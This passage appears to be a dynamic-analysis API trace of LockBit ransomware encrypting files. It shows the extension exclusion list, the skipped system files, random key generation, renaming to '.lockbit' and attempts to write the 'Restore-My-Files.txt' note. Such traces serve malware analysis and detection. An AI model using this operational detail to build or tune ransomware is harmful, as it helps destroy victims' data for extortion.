lpString2=".WMF") returned -1 [0112.653] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.lockbit") returned 72 [0112.653] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0112.654] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.654] malloc (_Size=0x40068) returned 0x3e70008 [0112.654] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1888) returned 1 [0112.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.655] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.656] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.666] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.666] malloc (_Size=0xa6) returned 0x77d7a8 [0112.666] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.667] free (_Block=0x77d7a8) [0112.667] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.667] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.667] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.668] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01178_.WMF", cAlternateFileName="")) returned 1 [0112.668] lstrcmpiW (lpString1=".", lpString2="DD01178_.WMF") returned -1 [0112.668] lstrcmpiW (lpString1="..", lpString2="DD01178_.WMF") returned -1 [0112.668] PathFindExtensionW (pszPath="DD01178_.WMF") returned=".WMF" [0112.668] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.668] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.669] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.669] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.670] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01178_.WMF") returned 1 [0112.670] lstrcmpiW (lpString1="ntldr", lpString2="DD01178_.WMF") returned 1 [0112.670] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01178_.WMF") returned 1 [0112.670] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01178_.WMF") returned -1 [0112.670] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01178_.WMF") returned -1 [0112.670] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01178_.WMF") returned 1 [0112.670] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01178_.WMF") returned 1 [0112.670] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned=".WMF" [0112.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.671] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.671] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.672] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.672] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.lockbit") returned 72 [0112.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0112.673] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.673] malloc (_Size=0x40068) returned 0x3ef0008 [0112.673] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3796) returned 1 [0112.673] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0112.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0112.674] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.681] malloc (_Size=0xa6) returned 0x77d7a8 [0112.681] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.681] free (_Block=0x77d7a8) [0112.682] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.682] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.682] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01179_.WMF", cAlternateFileName="")) returned 1 [0112.682] lstrcmpiW (lpString1=".", lpString2="DD01179_.WMF") returned -1 [0112.682] lstrcmpiW (lpString1="..", lpString2="DD01179_.WMF") returned -1 [0112.682] PathFindExtensionW (pszPath="DD01179_.WMF") returned=".WMF" [0112.682] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.682] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.683] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.684] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.684] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01179_.WMF") returned 1 [0112.685] lstrcmpiW (lpString1="ntldr", lpString2="DD01179_.WMF") returned 1 [0112.685] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01179_.WMF") returned 1 [0112.685] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01179_.WMF") returned -1 [0112.685] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01179_.WMF") returned -1 [0112.685] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01179_.WMF") returned 1 [0112.685] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01179_.WMF") returned 1 [0112.685] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.685] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned=".WMF" [0112.685] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.685] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.685] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.686] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.686] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.lockbit") returned 72 [0112.686] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0112.687] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.687] malloc (_Size=0x40068) returned 0x3d70450 [0112.687] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2024) returned 1 [0112.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0112.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0112.689] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0112.942] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.942] malloc (_Size=0xa6) returned 0x77d7a8 [0112.943] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0112.943] free (_Block=0x77d7a8) [0112.943] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.943] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.943] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x824, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01180_.WMF", cAlternateFileName="")) returned 1 [0112.943] lstrcmpiW (lpString1=".", lpString2="DD01180_.WMF") returned -1 [0112.943] lstrcmpiW (lpString1="..", lpString2="DD01180_.WMF") returned -1 [0112.943] PathFindExtensionW (pszPath="DD01180_.WMF") returned=".WMF" [0112.943] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.943] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.944] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.944] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.944] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.944] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.944] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.970] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.971] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.971] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.971] 